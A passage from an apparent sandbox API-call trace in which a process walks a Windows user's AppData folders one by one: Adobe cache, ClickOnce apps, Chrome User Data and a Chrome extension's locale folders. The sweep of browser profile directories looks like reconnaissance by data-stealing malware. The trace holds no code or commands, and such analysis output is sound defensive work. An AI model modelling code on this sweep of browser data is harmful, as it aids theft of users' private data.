lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0140.279] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32b28 [0140.279] FindClose (in: hFindFile=0xa32b28 | out: hFindFile=0xa32b28) returned 1 [0140.279] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.279] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.279] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.280] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.280] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.280] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0140.280] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0140.280] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.280] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.280] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.280] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.280] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.281] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.281] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xffffffff [0140.281] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.281] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32a68 [0140.281] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0140.281] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0140.281] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32c68 [0140.302] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32ca8 [0140.302] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x2b4dfd0 | out: lpFindFileData=0x2b4dfd0) returned 0xa32ce8 [0140.302] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\*", lpFindFileData=0x2b4dd4c | out: lpFindFileData=0x2b4dd4c) returned 0xa32d28 [0140.302] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0140.302] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33c00d0 | out: hHeap=0x20f0000) returned 1 [0140.302] FindClose (in: hFindFile=0xa32ce8 | out: hFindFile=0xa32ce8) returned 1 [0140.303] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33b00c8 | out: hHeap=0x20f0000) returned 1 [0140.303] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0140.303] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33a00c0 | out: hHeap=0x20f0000) returned 1 [0140.303] FindClose (in: hFindFile=0xa32c68 | out: hFindFile=0xa32c68) returned 1 [0140.303] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.304] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.304] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.304] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0140.304] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32c68 [0140.305] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32ca8 [0140.305] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0140.305] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33a00c0 | out: hHeap=0x20f0000) returned 1 [0140.305] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32ca8 [0140.306] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0140.306] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33a00c0 | out: hHeap=0x20f0000) returned 1 [0140.306] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32ca8 [0140.307] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0140.307] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33a00c0 | out: hHeap=0x20f0000) returned 1 [0140.307] FindClose (in: hFindFile=0xa32c68 | out: hFindFile=0xa32c68) returned 1 [0140.308] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.309] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.309] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.309] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.309] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.309] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.309] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.310] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32a68 [0140.310] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.310] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33a00c0 | out: hHeap=0x20f0000) returned 1 [0140.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32a68 [0140.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0140.313] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0140.313] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32c68 [0140.314] FindClose (in: hFindFile=0xa32c68 | out: hFindFile=0xa32c68) returned 1 [0140.314] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.314] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32c68 [0140.314] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32ca8 [0140.314] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0140.315] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.315] FindClose (in: hFindFile=0xa32c68 | out: hFindFile=0xa32c68) returned 1 [0140.315] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.315] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32c68 [0140.315] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32ca8 [0140.315] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0140.315] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.315] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32ca8 [0140.316] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0140.317] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.317] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32ca8 [0140.317] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0140.317] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.317] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32ca8 [0140.317] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0140.318] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.318] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32ca8 [0140.318] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\*", lpFindFileData=0x2b4dfd0 | out: lpFindFileData=0x2b4dfd0) returned 0xa32ce8 [0140.318] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\*", lpFindFileData=0x2b4dd4c | out: lpFindFileData=0x2b4dd4c) returned 0xa32d28 [0140.319] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa32d68 [0140.545] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0140.545] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0140.546] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0140.546] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0140.546] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0140.546] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0140.546] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0141.192] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0141.193] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0141.193] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0141.193] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0141.193] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0141.193] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0142.048] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0142.048] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.048] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0142.048] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0142.048] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.048] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.058] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.058] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.159] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.159] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.159] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.412] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.412] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.412] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.416] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.416] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.416] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.416] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.416] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.416] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.418] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.418] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.418] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.419] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.419] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.420] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.420] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.420] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.421] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.421] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.422] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.422] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.422] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.423] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.423] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.423] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.426] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.426] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.426] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.426] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.426] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.426] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.427] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.427] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.428] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.428] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.428] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.429] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.429] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.429] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.429] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.429] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0142.429] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0142.430] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0142.430] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: 